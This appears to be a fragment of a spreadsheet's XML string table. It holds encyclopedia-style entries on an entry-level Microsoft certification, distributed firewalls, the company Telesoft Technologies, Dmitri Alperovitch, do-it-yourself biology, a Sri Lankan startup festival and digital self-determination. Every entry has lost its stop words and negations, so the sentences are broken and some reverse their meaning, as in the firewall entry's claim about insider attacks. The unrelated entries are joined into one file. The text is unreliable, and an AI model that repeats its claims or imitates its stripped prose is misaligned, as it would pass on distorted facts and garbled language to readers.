17:13, june 2016 (utc)</t>
  </si>
  <si>
    <t>Microsoft Technology Associate</t>
  </si>
  <si>
    <t>microsoft technology associate entry-level certification validates fundamental technology skills knowledge microsoft products. exams designed assess validate core technical concepts three primary areas: databases server), development (visual studio) infrastructure (windows, windows server). exams certification offered part microsoft certified professional (mcp) program. exams retired june 2022. retired exam list october 2019, retired microsoft technology associate exams are: exam availability microsoft technology associate exams scheduled exam providers: certiport students, educators schools pearson vuethere multiple differences scheduling exam certiport pearson pearson vue, need identification documents certiport, need pearson vue, take photo want digital signature certiport outside united states, restriction voucher availability countries. example, greek authorized partner certiport give vouchers testing centers candidates pearson purchase voucher online vue's site. pearson testing centers, testing days hours often certiport, exam datetime days. references</t>
  </si>
  <si>
    <t>Distributed firewall</t>
  </si>
  <si>
    <t>distributed firewall security application host machine network protects servers user machines enterprise's networks unwanted intrusion. firewall system group systems (router, proxy, gateway) implements security rules enforce access control networks protect "inside" network "outside" network. they filter traffic regardless origin—the internet internal network. usually deployed behind traditional firewall, provide second layer defense. advantages distributed firewall allow security rules (policies) defined pushed enterprise-wide basis, necessary larger enterprises. basic working distributed firewalls often kernel-mode applications bottom stack operating system. they filter traffic regardless origin—the internet internal network. they treat internet internal network "unfriendly". they guard individual machine perimeter firewall guards overall network. distributed firewall function rests three notions: policy language states sort connections permitted prohibited, number system management tools, microsoft's asd, ipsec, network-level encryption mechanism internet protocol (tcp, udp, etc.)the basic idea simple. compiler translates policy language internal format. system management software distributes policy file hosts protected firewall. incoming packets accepted rejected "inside" host, according policy cryptographically verified identity sender. features central management system designing policies, transmission system transmit policies, implementation designed policies client end. central management system security policy distributed firewalls defined centrally, enforcement policy takes place endpoint (hosts, routers, etc.) centralized management ability populate servers end-users machines, configure "push out" consistent security policies, helps maximize limited resources. ability gather reports maintain updates centrally makes distributed security practical. this feature distributed firewalls helps ways. firstly, remote end-user machines secured. secondly, secure critical servers network preventing intrusion malicious code "jailing" code letting protected server used launchpad expanded attacks. policy transmission system distribution policy, security rules, different varies implementation. either directly pushed systems, pulled necessary. pull technique pull technique, hosts, booting notify central management server check whether central management server active. registers central management server requests policies implement. central management server provides host security policies. push technique push technique used policies updated central-management side network administrator, hosts updated immediately. this push technology ensures hosts always updated policies time. policy language defines inbound outbound connections component network policy domain allowed, affect policy decisions layer network, whether rejecting passing certain packets enforcing policies application layer stack. host-end implementation conventional firewalls rely controlling entry points function, precisely, rely assumption everyone side entry point—the firewall—is trusted, anyone side least potentially, enemy. distributed firewalls work enabling essential traffic machine protect, prohibiting types traffic prevent unwanted intrusions. security policies transmitted central management server also implemented host. host-end part distributed firewall provide administrative control network administrator control implementation policies. host allows traffic based security rules implemented. end-to-end encryption end-to-end encryption threat conventional firewalls, since firewall generally necessary keys peek encryption. distributed firewalls implementation technique end-to-end ipsec. ipsec protocol suite, recently standardized ietf, provides network-layer security services packet confidentiality, authentication, data integrity, replay protection, automated management. this artifact firewall deployment: internal traffic seen firewall cannot filtered; result, internal users mount attacks users networks without firewall able intervene. large networks today tend large number entry points. furthermore, many sites employ internal firewalls provide form compartmentalization. this makes administration particularly difficult, practical point view regard policy consistency, since unified comprehensive management mechanism exists. end-to-end ipsec, incoming packet associated certificate; access granted packet determined rights granted certificate. certificate name different, ipsec protection, packet dropped unauthorized. given access rights strong distributed firewall tied certificates, access rights limited changing certificates accepted. only hosts newer certificates considered “inside”; change installed, machine fewer privileges. network topology distributed firewalls protect hosts within topological boundary. system management packages used administer individual machines, security administrators define security policy terms host identifiers policy enforced individual host. conventional firewall enforce policy traffic traverses traffic exchanged among nodes protected network cannot controlled, gives attacker already insider somehow bypass firewall establish new, unauthorized entry point network without administrator's knowledge consent. conventional firewalls, protocols realaudio difficult process, conventional firewalls lacks certain knowledge readily available endpoints. increasing line speeds computation-intensive protocols firewall must support, traditional firewalls tend become congestion points. this processing networking speeds likely increase, computers (and hence firewalls) getting faster, combination complex protocols tremendous increase amount data must passed firewall likely continue outpace moore's law. effectiveness service exposure port scanning distributed firewalls excellent rejecting connection requests inappropriate services. they typically drop requests host, alternatively, instead send back response requesting connection authenticated, turn gives notice existence host. unlike conventional firewalls built pure packet filters cannot reject "stealth scans" well, distributed firewalls reassemble packets port scanner reject address spoofing these attacks dealt host distributed firewalls corresponding rules discarding packets inside network policy domain. distributed firewalls cryptographic mechanisms prevent attacks based forged source addresses, assumption trusted repository containing necessary credentials subject compromise itself. malicious software distributed firewall's framework policy language, allows policy decision application level, circumvent wide variety threats residing application intermediate level communication traffic. complex, resource-consuming situations decisions must made code like java, distributed firewalls placate threats condition contents communication packets interpreted semantically policy verifying mechanisms. stateful inspection packets shows easily adapted requirements allows finer granularity decision making. policy enforcement distributed firewalls also compromised malicious code contents completely disguised virtual private networks enciphered communication traffic screening unit network perimeter, unlike conventional firewalls. intrusion detection distributed firewalls detect attempted intrusions, difficulty probe collection. each individual host network notice probes forward central location processing correlation. former problem hard; many hosts already attempts. collection problematic, especially times poor connectivity central site. there also risk coordinated attacks effect, causing denial-of-service attack central machine. insider attacks distributed firewall's independence topological constraints supports enforcement policies, whether hosts members outsiders overall policy domain. they base decisions authenticating mechanisms inherent characteristics network's layout. moreover, compromise endpoint either legitimate user intruder weaken overall network leads directly compromise machines, given fact deployment virtual private networks prevents sniffing communication traffic attacked machine involved. end-point itself, assuming machine taken adversary must lead conclusion policy enforcement mechanisms broken. installation backdoors machine done quite easily security mechanisms flawed, lack perimeter firewall, trusted entity might prevent arbitrary traffic entering leaving compromised host. additionally, tools used allow tunneling another application's communication, prevented without proper knowledge decrypting credentials; moreover, given fact attack performed successfully, verifying mechanisms machine trusted anymore. user cooperation first glance, biggest weakness distributed firewalls greater susceptibility lack cooperation users. distributed firewalls reduce threat actual attacks insiders, simply making easier smaller groups users. thus, restrict access file server users need rather letting anyone inside company access. also worth expending effort prevent casual subversion policies. policies could digitally signed, verified frequently-changing awkward-to-replace location. stringent protections, policy enforcement incorporated tamper-resistant network card. references books sonnenreich, wes, yates, building linux openbsd firewalls, singapore: addison wiley zwicky, elizabeth, simon cooper, brent chapman, building internet firewalls o'reilly publications strebe, firewalls seven, publishers white papers reports hancock, bill "host-resident firewalls: defending windows nt/2000 servers desktops network attacks" bellovin, s.m. w.r. cheswick, "firewalls internet security: repelling wily hacker", addison-wesley, 1994. ioannidis, keromytis, a.d., bellovin, s.m. j.m. smith, "implementing distributed firewall", proceedings computer communications security (ccs), 190–199, november 2000, athens, greece.</t>
  </si>
  <si>
    <t>Telesoft Technologies</t>
  </si>
  <si>
    <t>telesoft technologies privately held based technology company develops cyber security, telecoms mobile products services government infrastructure. telesoft operations usa, india. cyber security products include high rate network flow monitoring appliances operate multi 100gbps networks, collection analysis software high rate event driven traffic recorders anomaly, ddos, crypto-jacking breech detection, latency historical analysis profiling incident response. 2022 telesoft launched managed detection response service, providing 24/7 human-led threat hunting, active response range cyber solutions based security operations centre (soc). history 1989: telesoft technologies founded 1989: card, allowing early computer telephony integration, opening market smaller suppliers 1991: passive network monitoring probes developed homeland security intelligence 1994: okeford protocol converter open programmable switch launched 1995: telesoft technologies opens americas office atlanta, 1997: telesoft technologies moved blandford forum 1999: ansty network monitoring product range oss/vas launched 2000: telesoft technologies adds building blandford forum campus 2007: okeford media platform/ivr launched automated speech recognition response, allowing rather interfaces 2008: okeford media platform certified voicexml compliant 2008: telesoft technologies opens india office noida 2009: telesoft technologies acquires think engine networks cognitronics danbury, 2009: telesoft releases mpac 3240/45 mpac 3250 2010: arne introduced service value added service applications oems system integrators telecoms market. 2011: think engine fpga accelerated probe session discovery meta-data extraction user session content 2012: mpac 6010 6010 provides accelerated i/o, packet processing embedded filtering routing, enabling compact powerful systems built 10gb ethernet networks. 2013: triton easy use, portable, multi-application test tool development, test installation engineers rapidly find faults validate performance lte/epc, volte/ims networks. 2014: tuna 100g filters, records provides playback 48gbit/s, guaranteed hardware timed play-out synchronisation. analyse record sessions based vlan, mpls variable position patterns 2015: firewall, high capacity intrusion prevention system (ips) enforces rules gsma best practice network border prevent abuse attacks network 2015: telesoft releases virtualised version arne systems (varne) 2016: officially opens extreme cyber annapolis junction, maryland, 2016: mpac security, enhanced 40gbit/s capture card offloads signature detection accelerate bespoke applications open source suricata 2016: ipfix probe, monitor networks real-time diagnose network issues maintain security ultra high performance ipfix probe 2016: selected gartner cool vendor security technology service providers, 2016 2016: telesoft moves indian office tapasya corp heights 2016: telesoft releases features varne okeford 5500 2017: telesoft selected finalist cyber security awards innovative product year award 2017: telesofts data analytics capability (tdac) officially released early 2017 2017: event driven record feature added cerne 40gbps platform 2018: features functionality added flowprobe 2019: flowstash officially released 2019: triton officially released 2019: flowprobe officially released 2022: managed detection response service launched references external links official website voicexml forum server online certified refurbished servers pci-sig peripheral component interconnect special interest group</t>
  </si>
  <si>
    <t>Dmitri Alperovitch</t>
  </si>
  <si>
    <t>dmitri alperovitch (russian: дмитрий михайлович альперович; born 1980) russian-born american computer security industry executive. co-founder former chief technology officer crowdstrike. august 2011, vice president threat research mcafee, published operation shady rat, report suspected chinese intrusions least organizations, including defense contractors, businesses worldwide, united nations international olympic committee. alperovitch naturalized american citizen born russia came united states 1994 family. early life education born moscow russian s.f.s.r., constituent republic soviet union, alperovitch u.s. citizen. 1994, father granted visa canada, year later family moved chattanooga, tennessee. alperovitch earned b.s. computer science 2001, m.s. information security 2003, georgia institute technology. school's first graduate degree information security. career alperovitch worked number computer security startups late 1990s early 2000s, including e-mail security startup ciphertrust, leading inventors trustedsource reputation system. upon acquisition ciphertrust secure computing 2006, research team launched software-as-a-service business company. alperovitch took vice president threat research mcafee, company acquired secure computing 2008.in january 2010, investigation operation aurora, chinese intrusions google dozen companies. subsequently, investigation night dragon espionage operation western multinational companies, traced song zhiyue, chinese national living heze city, shandong province.in late 2011, along entrepreneur george kurtz gregg marston, dmitri alperovitch co-founded became chief technology officer crowdstrike, security technology company focused helping enterprises governments protect intellectual property secrets cyberespionage cybercrime. 2015, capitalg (formerly google capital), $100 million capital drive crowdstrike. firm brought board senior executives, shawn henry, former executive assistant director (ead) fbi's criminal, cyber, response services branch, steve chabinsky, former deputy assistant director fbi's cyber division. 2017, crowdstrike received $256 million funding warburg pincus, accel partners, google capital stock valued billion.alperovitch awarded prestigious federal award contributions u.s. federal information security recognized 2013 2015 washingtonian (magazine)'s tech titans accomplishments field cybersecurity. august 2013, selected technology review's innovators under award previously larry page, sergey brin, mark zuckerberg.in 2016, politico magazine featured "politico influential thinkers, doers, visionaries transforming american politics.in 2017, fortune magazine listed alperovitch under annual ranking influential young people business, along emmanuel macron, mark zuckerberg, serena williams.he senior fellow atlantic council think tank named december 2013 foreign policy's leading global thinkers, along angela merkel, john kerry, bernanke, jeff bezos.in february 2020, alperovitch left crowdstrike launch silverado policy accelerator, nonprofit focused solving policy challenges connected great power competition u.s. adversaries. organization focuses particular policy issues related cybersecurity, international trade industrial security, economic environmental security. silverado policy accelerator launched march 2021 alperovitch executive chairman.in october 2021, alperovitch announced launch alperovitch institute cybersecurity studies based johns hopkins university's paul nitze school advanced international studies. institute offer master arts doctor philosophy degrees cybersecurity studies policy, executive education program private sector government leaders. references external links dalperovitch twitter dmitri alperovitch imdb</t>
  </si>
  <si>
    <t>Do-it-yourself biology</t>
  </si>
  <si>
    <t>do-it-yourself biology (diy biology, bio) growing biotechnological social movement individuals, communities, small organizations study biology life science using methods traditional research institutions. biology primarily undertaken individuals limited research training academia corporations, mentor oversee biologists little formal training. this done hobby, not-for-profit endeavour community learning open-science innovation, profit, start business. other terms also associated do-it-yourself biology community. terms biohacking wetware hacking emphasize connection hacker culture hacker ethic. term hacker used original sense finding clever ways things. term biohacking also used grinder body modification community, considered related distinct do-it-yourself biology movement. term biopunk emphasizes techno-progressive, political, artistic elements movement. history term "biohacking" well concept do-it-yourself biology known early 1988.biohacking entered francisco programmer maker communities early 2005, simple demonstrations basic experiments. diybio experiments became focus superhappydevhouse hackers, hobby gained additional momentum. 2005 carlson wrote article wired: "the garage biology upon want participate? take moment ebay." garage year, working project previously worked molecular sciences institute berkeley, california.in 2008, diybio organization founded jason bobe mackenzie cowell first meeting held.in 2010, genspace opened first community biology lab, months later followed biocurious, victoria makerspace. many labs organizations followed, including limited counter culture labs oakland, baltimore underground science space baltimore, thelab angeles, denver biolabs denver, estimated 2014 biology labs around world.: 2016, first conference focus specifically biohacking announced take place september oakland, aspects diybio movement seeks revise notion must academic advanced degree make significant contribution biology community. allows large numbers small organizations individuals participate research development, spreading knowledge higher priority turning profits. recent years, various ways live healthy many also focuses different simple ways biohack mind, body, metabolism sleep.the motivations biology include (but limited lowered costs, entertainment, medicine, biohacking, life extension, education. recent work combining open-source hardware microcontrollers like arduino reprap printers, low-cost scientific instruments developed. community laboratory space many organizations maintain laboratory akin wet-lab makerspace, providing equipment supplies members. many organizations also classes provide training. (usually $100), members join spaces experiments own. open source equipment biology movement attempts make available tools resources necessary anyone, including non-professionals, conduct biological engineering. first pieces open source laboratory equipment developed dremelfuge irish biohacker cathal garvey, uses printed tube holder attached dremel rotary tool spin tubes high speeds, replacing often expensive centrifuges. many devices like machines recreated extensively. recent times, complex devices created opendrop digital microfluidics platform nanodrop developed gaudilabs. opentrons makes open-source, affordable robots, start biology collaboration genspace. incuvers makes telemetric chambers cellular research affordable allow complete customizability environments. opencell, london based biotech provider hosts regular biohackathons help encourage opensource development. advocacy most advocacy biohacking safety, accessibility future legality experimentation. todd kuiken woodrow wilson center proposes safety self-governance, biologists need regulation. josiah zayner proposed safety inherent biohacking accessibility foremost concern large underrepresentation social ethnic minorities biohacking. research topics many biohacking projects revolve around modification life molecular genetic engineering. bioinformatics bioinformatics another popular target do-it-yourself biology research. fields, many programming languages used biology, languages used large bioinformatics libraries. examples include bioperl biopython, languages perl python, respectively. genetic engineering genetic engineers subculture biohackers accessible forms biohacking engineering microorganisms plants. experiments range using plasmids fluorescent bacteria, controlling gene expression using light bacteria, even using crispr engineer genome bacteria yeast. medicine restricted access medical care medicine pushed biohackers start experimenting medically related fields. open insulin project aims make recombinant protein insulin accessible creating open source protocol expression purification. other experiments involved medical treatments include whole body microbiome transplant creation open source artificial pancreases diabetics, openaps, loop androidaps. implants grinders subculture biohackers focus implanting technology introducing chemicals body enhance change bodies' functionality. some biohackers sense direction face using magnetic implant vibrates skin. 2000, controversial self-described "transgenic artist" eduardo appropriated standard laboratory work biotechnology genetics researchers order utilize critique scientific techniques. putative work transgenic kac, artist claimed collaborated french laboratory (belonging institut national recherche agronomique) procure green-fluorescent rabbit: rabbit implanted green fluorescent protein gene type jellyfish [aequorea victoria] order rabbit fluoresce green ultraviolet light. claimed work came known "gfp bunny", called alba. this claim disputed scientists noted performed exactly experiment (i.e., insertion jellyfish protein-coding gene) numerous animals (cats, dogs, etc.) previously create alba (known researchers "rabbit number 5256") direction kac. laboratory consequently kept possession transgenic rabbit created funded "transgenic art" never exhibited digital avignon festival [2000] intended. kac—claiming rabbit first bunny created name art—used dispute popularize issue disguised censorship launching "free alba" campaign. doctored photo artist holding day-glow-green tinted rabbit appears website. members critical ensemble written books staged multimedia performance interventions around issue, including flesh machine (focusing vitro fertilisation, surveillance body, liberal eugenics) cult order analyze how, words, "science institution authority regarding production knowledge, tends replace particular social function conventional christianity west").heather dewey-hagborg information artist biohacker uses genomic left behind people starting point creating lifelike, computer-generated, portraits. criticism concerns biohacking experiences many criticisms synthetic biology genetic engineering already receive, plus concerns relating distributed non-institutional nature work, involving potential hazards lack oversight professionals governments. concerns biohackers creating pathogens unmonitored garage laboratories federal bureau investigation (fbi) begin sending representatives diybio conferences 2009. arrest prosecution members work harmless microbes, artivist steve kurtz, denounced political repression critics argue u.s. government used post-9/11 anti-terrorism powers intimidate artists others criticize society.existing regulations specific field, possibility pathological organisms created released unintentionally intentionally biohackers become matter concern, example, spirit re-creation 1917 virus armed forces institute pathology researchers 2005. weapons mass destruction directorate worked american association advancement science's national science advisory board biosecurity convene series meetings discuss biosecurity, included discussions amateur biologists ways manage risks society poses.: 8.16 national institutes health, national science advisory board biosecurity leads efforts educate public "dual research concern", example websites like "science safety security". 2011, diybio organized conferences attempt create codes ethics biohackers.pat mooney, executive director group, critic biohacking argues that—using laptop computer, published gene sequence information, mail-order synthetic dna—just anyone potential construct genes entire genomes scratch (including lethal pathogens) near-future. 2007 group report warns danger development bio-terror, "bio-error".while diybio project date involved harmful agents, fear remains minds regulators laypersons. however, often pointed diybio early stage consider advanced projects feasible, successful transformative genetics projects undertaken yet. also worth noting that, individual could conceivably harm sufficient skill intent, exist biology labs throughout world greater access technology, skill funding accomplish bioweapons project.while detractors argue do-it-yourself biologists need sort supervision, enthusiasts argue uniform supervision impossible best prevent accidents malevolence encourage culture transparency, where, essence, do-it-yourself biologists would peer reviewed biohackers. enthusiasts argue fear potential hazards increased research education rather closing door profound positive impacts distributed biological technology human health, environment, standard living around world. lack precedent regarding business model, diybio founders opportunity innovators regulatory safety policy. groups organizations baltimore underground science space (bugss), baltimore, maryland biocurious, sunnyvale, california biofoundry, sydney, south wales biospacesg, singapore bricobio, montreal, québec boston open science laboratory (boslab), cambridge, massachusetts capital area biospace (cabs), bethesda, maryland charlottesville open lab, charlottesville, virginia counter culture labs, oakland, california denver biolabs, denver, colorado george stephenson foundation bioengineering educational laboratory bio-makerspace university pennsylvania philadelphia, pennsylvania four thieves vinegar collective genspace, brooklyn, york hackuarium, écublens international hackteria society, registered switzerland, established global hackteria network since 2009. paillasse, paris london biohackspace, london open insulin project, international collaboration open science network, vancouver, british columbia ottawa science, ottawa, ontario triangle biology, durham, victoria makerspace, victoria, british columbia also amateur chemistry open science references external links diybio.org, community biology beginners</t>
  </si>
  <si>
    <t>Disrupt Asia</t>
  </si>
  <si>
    <t>disrupt asia conference festival lanka dedicated startups innovation. organized agency lanka. innovation festival features startup showcase, knowledge hub, partner offerings, installations. pitching competition shortlisted startups pitch prizes. eminent panel consisting local foreign experts judges. references external links www.disruptasia.today</t>
  </si>
  <si>
    <t>Digital self-determination</t>
  </si>
  <si>
    <t>digital self-determination multidisciplinary concept derived legal concept self-determination applied digital sphere, address unique challenges individual collective agency autonomy arising increasing digitalization many aspects society daily life. origins there philosophically legally agreed-upon concept digital self-determination yet. broadly speaking, term describes attempt comprehensively project pattern human self-determination first explored disciplines like philosophy psychology, law) digital age. concept included official document first time arcep, french telecoms regulator, section 2021 report state internet, exploring work "network self-determination" conducted professor luca belli. self-determination philosophy concept self-determination relates concepts subjectivity, dignity, autonomy classic central-european philosophy derived immanuel kant's conception freedom. self-determination presupposes human beings entities capable reason responsibility rationally chosen justified actions (autonomy), ought treated accordingly. formulating categorical imperative (kategorischer imperativ), kant suggested humans, condition autonomy, must never treated means itself. pattern self-determination similarly aims enabling autonomous human beings create, choose pursue identity, action, life choices without undue interference. psychology psychology, concept self-determination closely related self-regulation intrinsic motivation, i.e., engaging behavior activity inherently rewarding opposed driven external motivations pressures, like monetary incentives, status, fear. context, self-determination intrinsic motivation linked feeling control one's choices behavior considered necessary psychological well-being. self-determination theory (sdt), first introduced psychologists richard ryan eduard deci 1980s, developed 1990s 2000s, largely influential shaping concept self-determination field psychology. ryan deci's proposed individuals' motivated behavior characterized three basic universal needs: autonomy, competence, relatedness. autonomy refers need feel free decide one's course action. competence refers need capacity skills undertake complete motivated behavior effective manner. finally, relatedness refers need experience warm caring social relationships feel connected others. according sdt, three needs must fulfilled optimal functioning psychological well-being. however, psychologists like barry schwartz argued self-determination taken extremes, freedom choice turn "tyranny choice". view, much autonomy many choices course action perceived overwhelming, make decisions difficult, ultimately lead psychological distress rather wellbeing. human rights international law, right people self-determination commonly recognized cogens rule. here, self-determination denotes people, based respect principle equal rights fair equality opportunity, right freely choose sovereignty, international political status, economic, social, cultural development interference. framework united nations, fundamental rights like self-determination mainly defined universal declaration human rights, international covenant civil political rights, international covenant economic, social cultural rights. informational self-determination german concept informational self-determination (informational selbstbestimmung), considered modern fundamental right protects unjustified data processing, featured prominently german federal constitutional court's (bundesverfassungsgericht) jurisprudence might direct precursor inspiration concept digital self-determination. 1983, bundesverfassungsgericht ruled context modern data processing, general right personality article conjunction article basic encompasses protection individual unlimited collection, storage, sharing personal data. fundamental right guarantees authority conferred individual principle, decide disclosure personal data." (volkszählungsurteil, headnote philosophically, right informational self-determination deeply rooted bundesverfassungsgericht's understanding inviolable human dignity (article grundgesetz) prohibition human objectification german: objektformel; example n°33 bverfge mikrozensus). this understanding refers back late 18th-century german philosophy enlightenment. volkszählungsurteil inspired concern modern data processing technology could lead "registration cataloging one's personality manner incompatible human dignity" (volkszählungsurteil, headnote view, human beings, inviolable dignity, never treated like depersonalized objectified resources harvested data. instead humans, capacity autonomy, self-determined agents possessing significant degree control informational images. self-determination digital sphere increasing digitization aspects society poses challenges concept realization self-determination. while digital sphere ushered innovation opened opportunities self-expression communication individuals across globe, reach benefits evenly distributed, oftentimes deepening existing inequalities power structures, commonly referred digital divide. moreover, digital transformation enabled, oftentimes unbeknownst individuals, mass collection, analysis, harvesting personal data private companies governments infer individuals' information preferences (e.g., tracking browsing shopping history), influence opinions behavior (e.g., filter bubbles targeted advertisements), and/or make decisions (e.g., approving loan employment application), thus posing threats individuals' privacy autonomy.although definition digital self-determination still evolving, term used address humans' capacity lack thereof) exercise self-determination existence usage digital media, spaces, networks, technologies, protection potential human flourishing digital world chief concerns.starting 2010s, multidisciplinary cross-sectoral initiatives around world working developing theoretical framework concept digital self-determination. 2015, cologne center ethics, rights, economics, social sciences health, housed university cologne (ceres), conducted study help define digital self-determination develop metrics measure fulfillment. their study report defines digital self-determination "the concrete development human personality possibility realizing one's plans action decisions act, insofar relates conscious digital media (co-)dependent existence functioning digital media". 2017, professor luca belli presented united nations internet governance forum concept network self-determination "right freely associate order define, democratic fashion, design, development management network infrastructure common good, individuals freely seek, impart receive information innovation." arguing right network self-determination finds basis fundamental right self-determination peoples well right informational self-determination, belli posits network self-determination plays pivotal role allowing individuals associate join efforts bridge digital divides bottom-up fashion, freely developing common infrastructure. concept gained traction latin american level, starting form core element research policy proposals dedicated community networks.in 2018, swiss government launched digital self-determination network response action plan federal council's 'digital switzerland' strategy, including representatives swiss federal administration, academia, civil society, private sector. work network conceptualizes digital self-determination enhancing trust digital transformation allowing actors society benefit potential data economy". this work proposes core principles digital self-determination transparency trust, control self-determined data sharing, user-oriented data spaces, decentralized data spaces operate proximity citizens' needs. work network aims create international network represents basic principles digital self-determination basis elaborate best practices, standards, agreements develop international data spaces". 2021, french telecoms regulator (arcep) referred concept digital self-determination official annual report dedicated "the state internet", drawing output document report "the value internet openness times crisis". 2021, centre data governance singapore management university launched major research project focusing concept digital self-determination, collaboration swiss government research partners. their theoretical framework focuses data governance privacy, proposes core components digital self-determination empowerment data subjects oversee sense self digital sphere, ability govern data, consent cornerstone privacy data protection, protection data malfeasance, accuracy authenticity data collected. this proposed framework also emphasizes digital self-determination refers individuals collectives concept understood context "rights dependent duties" parallel concepts social relational self, social responsibility, digital solidarity (see below: 3.1. addressing multilevel 'self' digital self-determination) 2021, digital asia collaboration berkman klein center harvard university global network internet society centers, conducted research sprint explore concept digital self-determination different perspectives across cultural contexts. this initiative approached digital self-determination enabler least contributor exercise autonomy agency face shrinking choices", address questions control, power, equity world increasingly constructed, mediated, times even dominated digital technologies digital media, including underlying infrastructures."in addition work governments research centers, civil society members also advocated digital self-determination. example, ferdinand schirach, legal attorney widely-read german writer fictional legal short stories novels, launched initiative entitled "jeder mensch", translates "every human". "jeder mensch", schirach calls addition fundamental rights charter fundamental rights european union. article proposal entitled "right digital self-determination", proposed "everyone right digital self-determination. excessive profiling manipulation people forbidden."in october 2021, international network digital self-determination created intention "bringing together diverse perspectives different fields around world study design ways engage trustworthy data spaces ensure human centric approaches network composed experts directorate international swiss federal department foreign affairs; centre artificial intelligence data governance singapore management university; berkman klein center harvard university; global tech policy practice school social sciences technology govlab york university. practical elements different sectors society, ranging legislators policy-makers, public organizations scholars, activists members civil society, called digital infrastructure, tools systems protect promote individuals' self-determination, including equal free access, human-centered design, better privacy protections control data. these elements closely connected complement another. example, equal access digital infrastructure enable representation diverse viewpoints participatory governance digital sphere, decentralized systems might necessary ensure individuals' control data. access digital infrastructure tools bridging various forms existing digital divides providing equitable fair access digital technologies internet proposed crucial ensure individuals able benefit digital age, including access information, services, advancement opportunities.in sense, concept digital self-determination overlaps concept "network self-determination" emphases groups unconnected scarcely connected individuals regain control digital infrastructures, building shaping governance framework organise common good. such, belli stresses network self-determination leads several positive externalities affected communities, preserving internet open, distributed, interoperable generative network networks. digital literacy digital literacy media literacy proposed necessary individuals acquire knowledge skills digital tools well critically assess content encounter online, create content, understand features implications digital technology used well technology consciously willingly engage with. addition basic digital navigation skills critical consumption information, definitions digital literacy extended include awareness existing alternatives digital platforms services used, understanding personal data handled, awareness rights existing legal protections, measures independently protect one's security privacy online (e.g., adoption obfuscation techniques evading protesting digital surveillance). representation diverse realities viewpoints internet activist pariser coined term filter bubble refer reduced availability divergent opinions realities encounter online consequence personalization algorithms like personalized search recommendation systems. filter bubbles suggested facilitate warped understanding others' points view world. ensuring wide representation diverse realities digital platforms could increasing exposure conflicting viewpoints avoiding intellectual isolation informational bubbles. human-centered design user interfaces experiences scholars coined term attention economy refer treatment human attention scarce commodity context ever-increasing amounts information products. view, increasing competition users' limited attention, especially relying advertising revenue models, creates pressing goal digital platforms many people possible spend much time attention possible using product service. quest users' scarce attention, platforms would incentivized exploit users' cognitive emotional weaknesses, example constant notifications, dark patterns, forced multitasking, social comparison, incendiary content. advocates human-centered design technology humane technology) propose technology refrain 'brain-hacking' practices, instead support users' agency time attention well overall wellbeing. data governance scholar shoshana zuboff coined term surveillance capitalism refer private sector's commodification users' personal data profit (e.g. targeted advertising), leading increased vulnerability surveillance exploitation. surveillance capitalism relies centralized data management models wherein private companies retain ownership control users' data. guard challenges individuals' privacy self-determination, various alternative data governance models recently proposed around world, including trusts, commons, cooperative, collaboratives, fiduciaries, "pods". these models overlap share common mission give control individuals data thus address current power imbalances data holders data subjects. current issues addressing multilevel 'self' digital self-determination digital self-determination individuals individual's exercising self-agency intimately connected digital environments embedded shape one's choice architecture, access information opportunities well exposure harm exploitation, thereby affecting person's capacity freely autonomously conduct life. variety digital technologies underlying infrastructure, regardless relatively visible indirect human interfaces, could contribute conditions empower disempower individual's self-determination spheres socio-economic participation, representation cultural identity political expression. extent technologically-mediated spheres influence could take place individual's self-determined choices focus growing contemporary debates across diverse geographies. debates concerns whether individual's privacy, form control one's information, sufficiently protected exploitative data harvesting micro-targeting exert undue behavioural influence individual part targeted group. developments area vary greatly across countries regions different privacy frameworks data policies, european union's general data protection regulation china's social credit system, approach personal data distinctly.other debates range whether individual agency decision-making undermined predictive algorithms; whether individual labor, particularly global south, encounter employment opportunities well unique vulnerabilities digital economy; whether individual's self-expression unduly discriminately policed surveillance technologies deployed smart cities, particularly integrating facial recognition emotion recognition capabilities biometric data, form digital panopticon; whether individual's access diverse information affected digital divide dominance centralized online platforms, potentially limiting one's capacity imagine identity make informed decisions. digital self-determination children digital media technology afford children opportunity engage various activities support development, learning, pleasure time. such activities include play, interactions others, sharing creating content, experimenting varied forms identities afforded mediums engage time, despite digital media affordances, children users years old, unintended consequences children consume content, vulnerable, ways interactions technology impact child's emotional, behavioral, cognitive development. therefore, calls within digital literacy children technology interaction research assert ethical design technology essential designing equitable environments children. work digital media learning acknowledges affordances technology creating expansive ways learning development children, time, pays attention children learn critical digital literacies enables communicate, evaluate, construct knowledge within digital media. additionally, ethical consideration taken account support children's self-determination. instance within body work, attention involving children decision making process technology design ethical methodological approach engaging design technology children. words, involving children within design process technologies thinking ethical dimensions children interactions enables shift notion vulnerability shifted towards supporting children enact self-determination positioning active creators digital futures. beyond ethical considerations, children's involvement digital technologies digital market practices also important relevance privacy data protection rights. predictive analytics tracking software systems impact children's digital real life choices exploiting massive profiling practices. fact, ubiquitous algorithmic systems state private sector level, children's privacy easily violated personally identifiable digital sphere.article implies responsibility states children right form express views "freely, without pressure". literal analysis, pressure refers kind manipulation, oppression exploitation. states parties recognize children regardless capable forming expressing autonomous opinions. also, stated committee children right heard even comprehensive understanding subject matter affecting them. moreover, article uncrc states best interest child shall embedded private governmental decision making processes shall primary consideration relation services procedures involve children. anchoring responsibilities private public digital practices highlighted general comment committee rights child, children great risk digital domain regarding vulnerable evolving identity. turns proliferation mass surveillance predictive analytics, disputes states protect children's innate rights. end, recent class actions regulation efforts tech firms promising examples context pushing private sector adopt privacy-preserving practices children provide golden shield autonomy. incautiously regulated atmosphere, become easier make profit help behavioral advertising children. appropriate consent- inform/ parental consent practices, easy manipulate exploit intrinsic vulnerabilities children nudge choose specific products applications. regarding this, article gdpr provides limits processing personal data children related information society services(iss). pursuant article conditions children least years old, child give consent lawful processing personal data restricted purpose processing (art(6)(1)(a). children years old, lawful extent consent given holder parental responsibility child. this limit lower member states. addition this, emphasized data controllers take necessary measurements relation protection children's data. supporting these, recital states children merit specific protection use, collection processing data taking consideration children less aware impacts, consequences safeguards respect processing personal data. gdpr also refers children articles recitals beyond gdpr, structured regulations uk's information commissioner's office (ico) children code (formally appropriate design code) passed september 2020. children code sets forth limit regard ability give free implying responsibility providers online services apps, games, connected devices toys services. what differs children code regulations applies information society services likely accessed children. this means, even service directly aimed children, parties offer services must comply children code. ico's children code also infused notion best interest child laid uncrc. having broad scope, lists guiding points organizations support notion best interest child recognizing children evolving capacity form views giving weight views, protecting needs developing ideas identity, right assembly play. code also extends protection personal data children standards data minimisation, data protection impact assessments, appropriate design, privacy default transparency. geopolitical cultural power dynamics digital world digital colonialism politics empire already permeating shared histories. unequal social relations colonizing colonized peoples materialized exploitation, segregation, epistemic violence, throughout world, discourses colonialism dominated peoples' perceptions cultures. post-colonial 